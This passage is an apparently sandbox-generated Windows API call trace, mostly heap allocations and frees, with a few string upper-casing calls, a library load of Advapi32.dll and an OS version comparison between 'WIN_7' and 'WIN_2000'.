lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0256.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0256.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0256.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0256.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0256.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0256.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0256.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.852] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0256.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0256.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.853] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.853] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0256.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0256.853] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0256.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0256.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2bb8 [0256.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0256.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0256.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0256.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0256.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.854] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0256.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0256.855] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0256.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0256.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0256.855] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0256.856] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.856] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0256.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0256.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.857] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0256.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0256.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0256.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0256.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0256.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0256.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0256.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.858] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0256.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0256.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0256.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0256.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0256.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0256.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0256.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.859] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0256.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0256.860] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0256.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0256.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0256.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fa8 [0256.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0256.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0256.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0256.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0256.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0256.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.862] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0256.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0256.862] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0256.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c48 [0256.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.862] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0256.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0256.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0256.863] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0256.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0256.863] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0256.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0256.864] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0256.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 